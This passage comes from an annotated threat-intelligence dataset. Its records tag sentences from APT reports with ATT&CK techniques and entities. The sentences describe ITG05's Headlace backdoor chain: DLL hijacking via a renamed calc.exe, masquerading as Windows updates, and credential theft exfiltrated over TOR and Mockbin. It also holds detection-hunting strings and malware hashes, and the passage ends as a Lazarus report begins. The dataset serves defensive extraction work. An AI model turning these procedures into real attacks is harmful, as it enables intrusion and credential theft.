clicking on Calc.exe", "start": 18, "end": 45, "label": "Action" }, { "text": "load a malicious DLL that is packaged alongside Calc in the malicious archive", "start": 49, "end": 126, "label": "Action" }, { "text": "Calc.exe", "start": 37, "end": 45, "label": "MalwareTool" }, { "text": "malicious DLL", "start": 56, "end": 69, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s90-2929d3", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 90, "context_before": "This involves the victim clicking on Calc.exe to load a malicious DLL that is packaged alongside Calc in the malicious archive.", "sentence_text": "The DLL then executes the Headlace CMD dropper file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Execute the Headlace CMD dropper via a loaded DLL.", "entities": [ { "text": "executes the Headlace CMD dropper file", "start": 13, "end": 51, "label": "Action" }, { "text": "Headlace CMD dropper file", "start": 26, "end": 51, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s91-1f2f13", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 91, "context_before": "The DLL then executes the Headlace CMD dropper file.", "sentence_text": "In order to trick victims into running the executable, Calc.exe is renamed and contains whitespace padding before its extension, which may prevent users from spotting the suspicious .EXE extension.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Rename Calc.exe and add whitespace padding to its extension to disguise it and trick victims into execution.", "entities": [ { "text": "Calc.exe", "start": 55, "end": 63, "label": "MalwareTool" }, { "text": "is renamed and contains whitespace padding before its extension", "start": 64, "end": 127, "label": "Action" }, { "text": "trick victims into running the executable", "start": 12, "end": 53, "label": "Action" }, { "text": ".EXE extension", "start": 182, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s92-1ef9cc", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 92, "context_before": "In order to trick victims into running the executable, Calc.exe is renamed and contains whitespace padding before its extension, which may prevent users from spotting the suspicious .EXE extension.", "sentence_text": "Direct Execution", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p17-s93-8f8c03", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 93, "context_before": "Direct Execution", "sentence_text": "In this chain, the threat actor directs the victim to execute the Headlace CMD dropper directly by disguising it as a Windows update script and reporting fake update status messages in the console.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Trick the victim into executing the Headlace CMD dropper by masquerading it as a Windows update script and displaying fake update messages.", "entities": [ { "text": "the threat actor", "start": 15, "end": 31, "label": "ThreatActor" }, { "text": "directs the victim to execute the Headlace CMD dropper directly", "start": 32, "end": 95, "label": "Action" }, { "text": "disguising it as a Windows update script", "start": 99, "end": 139, "label": "Action" }, { "text": "reporting fake update status messages in the console", "start": 144, "end": 196, "label": "Action" }, { "text": "Headlace CMD dropper", "start": 66, "end": 86, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s94-7e0a66", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 94, "context_before": "In this chain, the threat actor directs the victim to execute the Headlace CMD dropper directly by disguising it as a Windows update script and reporting fake update status messages in the console.", "sentence_text": "Headlace is a new backdoor discovered by CERT-UA in September 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p17-s95-cbe678", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 95, "context_before": "Headlace is a new backdoor discovered by CERT-UA in September 2023.", "sentence_text": "It consists of three components: a .CMD dropper, a .VBS launcher and a .BAT backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p17-s96-97a8ac", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 96, "context_before": "It consists of three components: a .CMD dropper, a .VBS launcher and a .BAT backdoor.", "sentence_text": "The initial dropper starts by writing both other components into the %PROGRAMDATA% directory.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Write additional components to the %PROGRAMDATA% directory for continued operation.", "entities": [ { "text": "initial dropper", "start": 4, "end": 19, "label": "MalwareTool" }, { "text": "writing both other components into the %PROGRAMDATA% directory", "start": 30, "end": 92, "label": "Action" }, { "text": "%PROGRAMDATA% directory", "start": 69, "end": 92, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s97-edaf6a", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 97, "context_before": "The initial dropper starts by writing both other components into the %PROGRAMDATA% directory.", "sentence_text": "It then runs the .VBS launcher and after a short timeout it displays the lure as a decoy and deletes its traces from the directory it was started in.\nFig.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.005", "name": "Visual Basic" }, { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Execute a VBS launcher, display a decoy lure, and delete traces from the execution directory.", "entities": [ { "text": "runs the .VBS launcher", "start": 8, "end": 30, "label": "Action" }, { "text": "displays the lure as a decoy", "start": 60, "end": 88, "label": "Action" }, { "text": "deletes its traces from the directory it was started in", "start": 93, "end": 148, "label": "Action" }, { "text": ".VBS launcher", "start": 17, "end": 30, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s98-02e80e", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 98, "context_before": "It then runs the .VBS launcher and after a short timeout it displays the lure as a decoy and deletes its traces from the directory it was started in.\nFig.", "sentence_text": "10: Headlace dropper script The .VBS launcher uses the Wscript.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p17-s99-f21a00", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 99, "context_before": "10: Headlace dropper script The .VBS launcher uses the Wscript.", "sentence_text": "Shell object to execute the .BAT file, which acts as a backdoor.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Command and Scripting Interpreter", "id": "T1059" } ], "procedure": "The script executes a BAT file to establish a backdoor.", "entities": [ { "text": "execute the .BAT file", "start": 16, "end": 37, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p18-s101-21c25c", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 101, "context_before": "Fig.", "sentence_text": "11: Headlace backdoor script During the last campaign, X-Force observed a new infection chain leading to Headlace.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p18-s102-de1232", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 102, "context_before": "11: Headlace backdoor script During the last campaign, X-Force observed a new infection chain leading to Headlace.", "sentence_text": "The binary is a copy of the legitimate calc.exe, which is vulnerable to DLL hijacking.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p18-s103-7f3dff", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 103, "context_before": "The binary is a copy of the legitimate calc.exe, which is vulnerable to DLL hijacking.", "sentence_text": "Once executed, it searches the current directory for WindowsCodecs.dll, one of the hidden files, and loads it.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Search for and load a malicious DLL (WindowsCodecs.dll) from the current directory via DLL hijacking.", "entities": [ { "text": "searches the current directory for WindowsCodecs.dll", "start": 18, "end": 70, "label": "Action" }, { "text": "loads it", "start": 101, "end": 109, "label": "Action" }, { "text": "WindowsCodecs.dll", "start": 53, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p18-s104-b7cfac", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 104, "context_before": "Once executed, it searches the current directory for WindowsCodecs.dll, one of the hidden files, and loads it.", "sentence_text": "The DLL's main function was overwritten to execute the hidden .CMD file that is the Headlace payload.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Overwrite DLL function to execute a hidden CMD payload (Headlace).", "entities": [ { "text": "was overwritten to execute the hidden .CMD file", "start": 24, "end": 71, "label": "Action" }, { "text": ".CMD file", "start": 62, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "Headlace payload", "start": 84, "end": 100, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p18-s105-1332d6", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 105, "context_before": "The DLL's main function was overwritten to execute the hidden .CMD file that is the Headlace payload.", "sentence_text": "By using indirect execution, the malicious activity is more difficult to detect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p18-s106-d11c04", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 18, "sentence_id": 106, "context_before": "By using indirect execution, the malicious activity is more difficult to detect.", "sentence_text": "Another variant of Headlace would disguise itself as a Windows update.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": [ { "name": "Masquerading", "id": "T1036" } ], "procedure": "The malware disguises itself as a Windows update to evade detection.", "entities": [ { "text": "disguise itself", "start": 34, "end": 49, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p19-s108-ef41e3", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 19, "sentence_id": 108, "context_before": "Fig.", "sentence_text": "12: Headlace dropper faking a Windows update", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s109-03e149", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 109, "context_before": "12: Headlace dropper faking a Windows update", "sentence_text": "Actions on objective According to observations of CERT-UA, once a foothold has been established on the system, several follow-up payloads are used to capture NTLM credentials or SMB hashes of user accounts and attempt to exfiltrate them via the TOR network.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1003", "name": "OS Credential Dumping" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Capture NTLM credentials or SMB hashes and exfiltrate them via the TOR network.", "entities": [ { "text": "capture NTLM credentials or SMB hashes of user accounts", "start": 150, "end": 205, "label": "Action" }, { "text": "attempt to exfiltrate them via the TOR network", "start": 210, "end": 256, "label": "Action" }, { "text": "TOR network", "start": 245, "end": 256, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p20-s110-89dec8", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 110, "context_before": "Actions on objective According to observations of CERT-UA, once a foothold has been established on the system, several follow-up payloads are used to capture NTLM credentials or SMB hashes of user accounts and attempt to exfiltrate them via the TOR network.", "sentence_text": "X-Force has observed variants of Nishang's \"Start- CaptureServer.ps1\" script, which were modified to exfiltrate credentials through Mockbin.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Modify a PowerShell script to exfiltrate credentials through Mockbin.", "entities": [ { "text": "Start- CaptureServer.ps1", "start": 44, "end": 68, "label": "MalwareTool" }, { "text": "were modified to exfiltrate credentials through Mockbin", "start": 84, "end": 139, "label": "Action" }, { "text": "Mockbin", "start": 132, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p20-s111-f3cf56", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 111, "context_before": "X-Force has observed variants of Nishang's \"Start- CaptureServer.ps1\" script, which were modified to exfiltrate credentials through Mockbin.", "sentence_text": "This activity was also reported on by Zscaler in the \"Steal- It\" campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s112-808e5f", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 112, "context_before": "This activity was also reported on by Zscaler in the \"Steal- It\" campaign.", "sentence_text": "In addition, ITG05 is also known to leverage custom exfiltration tools such as Graphite and Credomap.", "relevant": "yes", "tactic": [ { "name": "Exfiltration", "id": "TA0010" } ], "techniques": [ { "name": "Exfiltration Over C2 Channel", "id": "T1041" } ], "procedure": "The threat actor uses custom tools to exfiltrate data.", "entities": [ { "text": "leverage custom exfiltration tools", "start": 36, "end": 70, "label": "Action" }, { "text": "Graphite", "start": 79, "end": 87, "label": "MalwareTool" }, { "text": "Credomap", "start": 92, "end": 100, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p20-s113-7509ae", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 113, "context_before": "In addition, ITG05 is also known to leverage custom exfiltration tools such as Graphite and Credomap.", "sentence_text": "Conclusion\nX-Force assesses with high confidence that ITG05 will continue to leverage attacks against diplomatic and academic centers to provide the adversary with advanced insight into emergent policy decisions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s114-147171", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 114, "context_before": "Conclusion\nX-Force assesses with high confidence that ITG05 will continue to leverage attacks against diplomatic and academic centers to provide the adversary with advanced insight into emergent policy decisions.", "sentence_text": "Given recent operations, ITG05 remains adaptable to changes in opportunity within the cyber threat landscape by exploiting public CVEs and leveraging commercially available infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit public CVEs and leverage commercially available infrastructure to conduct operations.", "entities": [ { "text": "ITG05", "start": 25, "end": 30, "label": "ThreatActor" }, { "text": "exploiting public CVEs", "start": 112, "end": 134, "label": "Action" }, { "text": "leveraging commercially available infrastructure", "start": 139, "end": 187, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p20-s115-b453dc", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 115, "context_before": "Given recent operations, ITG05 remains adaptable to changes in opportunity within the cyber threat landscape by exploiting public CVEs and leveraging commercially available infrastructure.", "sentence_text": "Recommendations\nX-Force recommends all individuals and entities engaged in or informing policy creation to remain in a heightened state of defensive security and to:\n• Stay abreast of newly published exploits likely to be used by APT actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s116-315b4a", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 116, "context_before": "Recommendations\nX-Force recommends all individuals and entities engaged in or informing policy creation to remain in a heightened state of defensive security and to:\n• Stay abreast of newly published exploits likely to be used by APT actors.", "sentence_text": "• Hunt for regularly spawned processes containing “msedge --headless- new --disable-gpu”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s117-6c1009", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 117, "context_before": "• Hunt for regularly spawned processes containing “msedge --headless- new --disable-gpu”.", "sentence_text": "• Hunt for headless MS Edge processes downloading .CSS files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s118-3958f2", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 118, "context_before": "• Hunt for headless MS Edge processes downloading .CSS files.", "sentence_text": "• Monitor for downloaded archives containing .CMD files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s119-739184", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 119, "context_before": "• Monitor for downloaded archives containing .CMD files.", "sentence_text": "• Monitor for DLL hijacking via modified WindowsCodecs.dll files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s120-5f4b77", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 120, "context_before": "• Monitor for DLL hijacking via modified WindowsCodecs.dll files.", "sentence_text": "• Monitor for filenames containing an unusually large number of consecutive whitespaces.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s121-4f30ee", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 121, "context_before": "• Monitor for filenames containing an unusually large number of consecutive whitespaces.", "sentence_text": "• Monitor network traffic for unusual or unsanctioned commercial service use.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s122-d1acc5", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 122, "context_before": "• Monitor network traffic for unusual or unsanctioned commercial service use.", "sentence_text": "• Monitor for suspicious use of browsers in headless mode.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s123-d9db26", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 123, "context_before": "• Monitor for suspicious use of browsers in headless mode.", "sentence_text": "• Install and configure endpoint security software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s125-4509d2", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 125, "context_before": "•", "sentence_text": "Update relevant network security monitoring rules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p20-s126-85b8a8", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 20, "sentence_id": 126, "context_before": "Update relevant network security monitoring rules.", "sentence_text": "• Educate staff on the potential threats to the organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p21-s127-fe4bba", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 21, "sentence_id": 127, "context_before": "• Educate staff on the potential threats to the organization.", "sentence_text": "Indicator\nIndicator Context\nType\nURL JS Dropper URL id=aec02d48-92f3-45a5-a003-051369b51928 URL JS Dropper URL id=488354ce-01ce-4d45-b47a-88701d40c52a URL JS Dropper URL f14f-4014-8b28-8329b0118936 68bfa69cdbf947eac31e736b2e54244e829e302ea8dafd65edc6e0f879257a53 sha256 archive malicious batch 0db8cd7f349afe5a85cd3fd798e2cf4dcb7d2cbbdea3c312f2c7108c4347ada4 sha256 script malicious batch a706778508af9e507d6d4b509276e9b82ce94f8a2ec913cc2deadba5aaa7d538", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p21-s128-a55638", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 21, "sentence_id": 128, "context_before": "Indicator\nIndicator Context\nType\nURL JS Dropper URL id=aec02d48-92f3-45a5-a003-051369b51928 URL JS Dropper URL id=488354ce-01ce-4d45-b47a-88701d40c52a URL JS Dropper URL f14f-4014-8b28-8329b0118936 68bfa69cdbf947eac31e736b2e54244e829e302ea8dafd65edc6e0f879257a53 sha256 archive malicious batch 0db8cd7f349afe5a85cd3fd798e2cf4dcb7d2cbbdea3c312f2c7108c4347ada4 sha256 script malicious batch a706778508af9e507d6d4b509276e9b82ce94f8a2ec913cc2deadba5aaa7d538", "sentence_text": "sha256 script malicious batch ed982645d677c04cb5846251924a12e0e2c9ed16d8fa800a628189faf5009c9f sha256 script malicious batch 896ca8488c9d8792bd0197646d857e0c2ae0312bbc6d812c12da45016f019264 sha256 script malicious batch 595590fdfa9618b7f7aab5b8795f9336d71c8918f60aa88dce5d4b07c7071a5a sha256 script malicious batch 726af8cd2d92691045ebe659d77acf4ae19b7172e383556befb79719fb78d7ce sha256 script malicious batch ab5aef93ffe694970374af638b407dbd56ea5a548235973f51cba67cd7baa07e sha256 script malicious batch 19e95b32b77d8dfd294c085793cd542d82eddac8e772818fea2826fa02a5cc54 sha256 script malicious batch f5b7a2d9872312e000acbe3dc8153707acecc5ba184f97ad6014327db16549c7 sha256 script malicious batch d281a1fa09e7810a4a9e13750d227f557e54370689fd86216332534bc9214918 sha256 script malicious batch a760b01841a120eccc22856af1c9a8e513871366ef329502f42f9648708720ca sha256 script malicious batch 103adb71848a31021692f5ba2ef1691eb29f3ded81b86954753f2f2fbeda08a7 sha256 script 47074a6d033966d07e4587705401533ad6c5fa2b11303c520a37999337d1a1eb sha256 malicious DLL", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p22-s129-066b4d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 22, "sentence_id": 129, "context_before": "sha256 script malicious batch ed982645d677c04cb5846251924a12e0e2c9ed16d8fa800a628189faf5009c9f sha256 script malicious batch 896ca8488c9d8792bd0197646d857e0c2ae0312bbc6d812c12da45016f019264 sha256 script malicious batch 595590fdfa9618b7f7aab5b8795f9336d71c8918f60aa88dce5d4b07c7071a5a sha256 script malicious batch 726af8cd2d92691045ebe659d77acf4ae19b7172e383556befb79719fb78d7ce sha256 script malicious batch ab5aef93ffe694970374af638b407dbd56ea5a548235973f51cba67cd7baa07e sha256 script malicious batch 19e95b32b77d8dfd294c085793cd542d82eddac8e772818fea2826fa02a5cc54 sha256 script malicious batch f5b7a2d9872312e000acbe3dc8153707acecc5ba184f97ad6014327db16549c7 sha256 script malicious batch d281a1fa09e7810a4a9e13750d227f557e54370689fd86216332534bc9214918 sha256 script malicious batch a760b01841a120eccc22856af1c9a8e513871366ef329502f42f9648708720ca sha256 script malicious batch 103adb71848a31021692f5ba2ef1691eb29f3ded81b86954753f2f2fbeda08a7 sha256 script 47074a6d033966d07e4587705401533ad6c5fa2b11303c520a37999337d1a1eb sha256 malicious DLL", "sentence_text": "Indicator\nIndicator Context\nType\n79fe0b155cf5d2b45d28946ad6ba47f7282b468af064c29346dcd1dcd0aec507 sha256 malicious DLL 9a798e0b14004e01c5f336aeb471816c11a62af851b1a0f36284078b8cf09847 sha256 malicious DLL malicious 290b63be4b81ee8a569cb3298eac089b775acc07c82a2d9ea800de8314c6f342 sha256 javascript droppe ed56740c66609d2bbd39dc60cf29ee47743344a9a6861bee7c08ccfb27376506 sha256 malicious lnk malicious visual a37140d97600573ace4fc31a9d289adcedb5c9cbfb92059b7184e46b635aaf57 sha256 basic script 9f5846193f545341b0c897947e07bc068712e396fe7c0863d43420bbd633aab1 sha256 news_week_6.doc f983d786f4dc2d1793f6b28907c4035c96b6b5c8765ba12dc4510dab0fceabf5 sha256 news_week_6.zip 84638698fdcf2e9e45e7dd560c8d00fb4da6fa32dabaacd31b3538d38755dad4 sha256 news_week_6.zip 5b8c240083cba4442fb6bbb092efd430ce998530cc10fd181b3f71845ec190ce sha256 news_week_6.zip 16bcd167162e4ded71b8c7e9a2587be821d3a752c71fcbb2ae64cf1088b62fc0 sha256 news_week_6.zip 1f4792dadaf346969c5e4870a01629594b6c371de21f8635c95aa6aba24ef24c sha256 war.docx 8cc664ff412fc80485d0af61fb0617f818d37776e5a06b799f74fe0179b31768 sha256 war.zip 2ac6735e8e0b23b222161690adf172aec668894d170299e9ff2c54a4ec25b1f4 sha256 war.zip d37779e16a92da7bd05eae50c64b36e2e2022eb441382be686fda4dbd1800e90 sha256 war.zip 45e44afeb8b890004fd1cb535978d0754ceaa7129082cb72386a80a5532700d1 sha256 Zeyilname.zip 22ed5c5cd9c6a351398f1e56efdfb16d52cd33cb4b206237487a03443d3de893 sha256 Zeyilname.zip 243bab79863327915c315c188c0589202f64b3500a3fee3e2c9f3d34e8e1f154 sha256 Zeyliname.docx Razumkov Centre 5a58e99a0ecdc461ce11c8253df9ea410076d56abc254628ed5ff4e5622acfde sha256 pdf e699a7971a38fe723c690f37ba81187eb8ed78e51846aa86aa89524c325358b4 sha256 EU Parliament doc 1cfa9dbc91e3d136cbd42670f5a587963dab5898e7bd68684966d6e07bcb23e2 sha256 Roadmap.docx 2023-12-bois- position-on- 3cc52ef447578f4ab549f692013d7f2e849aba8cad83a8d63bf1569d874f38fa sha256 accessing-capital pr.docx a50e32f52c249129655a9cb7be28b4efc32244c70f5ed1b4c4925b1b8f41199e sha256 IN11897.pdf", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p22-s130-ead66b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 22, "sentence_id": 130, "context_before": "Indicator\nIndicator Context\nType\n79fe0b155cf5d2b45d28946ad6ba47f7282b468af064c29346dcd1dcd0aec507 sha256 malicious DLL 9a798e0b14004e01c5f336aeb471816c11a62af851b1a0f36284078b8cf09847 sha256 malicious DLL malicious 290b63be4b81ee8a569cb3298eac089b775acc07c82a2d9ea800de8314c6f342 sha256 javascript droppe ed56740c66609d2bbd39dc60cf29ee47743344a9a6861bee7c08ccfb27376506 sha256 malicious lnk malicious visual a37140d97600573ace4fc31a9d289adcedb5c9cbfb92059b7184e46b635aaf57 sha256 basic script 9f5846193f545341b0c897947e07bc068712e396fe7c0863d43420bbd633aab1 sha256 news_week_6.doc f983d786f4dc2d1793f6b28907c4035c96b6b5c8765ba12dc4510dab0fceabf5 sha256 news_week_6.zip 84638698fdcf2e9e45e7dd560c8d00fb4da6fa32dabaacd31b3538d38755dad4 sha256 news_week_6.zip 5b8c240083cba4442fb6bbb092efd430ce998530cc10fd181b3f71845ec190ce sha256 news_week_6.zip 16bcd167162e4ded71b8c7e9a2587be821d3a752c71fcbb2ae64cf1088b62fc0 sha256 news_week_6.zip 1f4792dadaf346969c5e4870a01629594b6c371de21f8635c95aa6aba24ef24c sha256 war.docx 8cc664ff412fc80485d0af61fb0617f818d37776e5a06b799f74fe0179b31768 sha256 war.zip 2ac6735e8e0b23b222161690adf172aec668894d170299e9ff2c54a4ec25b1f4 sha256 war.zip d37779e16a92da7bd05eae50c64b36e2e2022eb441382be686fda4dbd1800e90 sha256 war.zip 45e44afeb8b890004fd1cb535978d0754ceaa7129082cb72386a80a5532700d1 sha256 Zeyilname.zip 22ed5c5cd9c6a351398f1e56efdfb16d52cd33cb4b206237487a03443d3de893 sha256 Zeyilname.zip 243bab79863327915c315c188c0589202f64b3500a3fee3e2c9f3d34e8e1f154 sha256 Zeyliname.docx Razumkov Centre 5a58e99a0ecdc461ce11c8253df9ea410076d56abc254628ed5ff4e5622acfde sha256 pdf e699a7971a38fe723c690f37ba81187eb8ed78e51846aa86aa89524c325358b4 sha256 EU Parliament doc 1cfa9dbc91e3d136cbd42670f5a587963dab5898e7bd68684966d6e07bcb23e2 sha256 Roadmap.docx 2023-12-bois- position-on- 3cc52ef447578f4ab549f692013d7f2e849aba8cad83a8d63bf1569d874f38fa sha256 accessing-capital pr.docx a50e32f52c249129655a9cb7be28b4efc32244c70f5ed1b4c4925b1b8f41199e sha256 IN11897.pdf", "sentence_text": "To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence or offensive security services schedule a meeting here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-10_aptnotes_report-p1-s1-1a7e41", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "A cascade of compromise: unveiling Lazarus’ new campaign securelist.com/unveiling-lazarus-new-campaign/110888 Authors Seongsu Park Earlier this year, a software vendor was compromised by the Lazarus malware delivered through unpatched legitimate software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Deliver Lazarus malware through unpatched legitimate software to compromise a vendor.", "entities": [ { "text": "Lazarus", "start": 35, "end": 42, "label": "ThreatActor" }, { "text": "Lazarus malware", "start": 191, "end": 206, "label": "MalwareTool" }, { "text": "was compromised by the Lazarus malware delivered through unpatched legitimate software", "start": 168, "end": 254, "label": "Action" } ] }, { "uid": "aptnotes-10_aptnotes_report-p1-s2-eaa7c1", "source": "aptnotes", "doc_id": "10_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "A cascade of compromise: unveiling Lazarus’ new campaign securelist.com/unveiling-lazarus-new-campaign/110888 Authors Seongsu Park Earlier this year, a software vendor was compromised by the Lazarus malware delivered through unpatched legitimate software.", "sentence_text": "What’s remarkable is that these software vulnerabilities were not new, 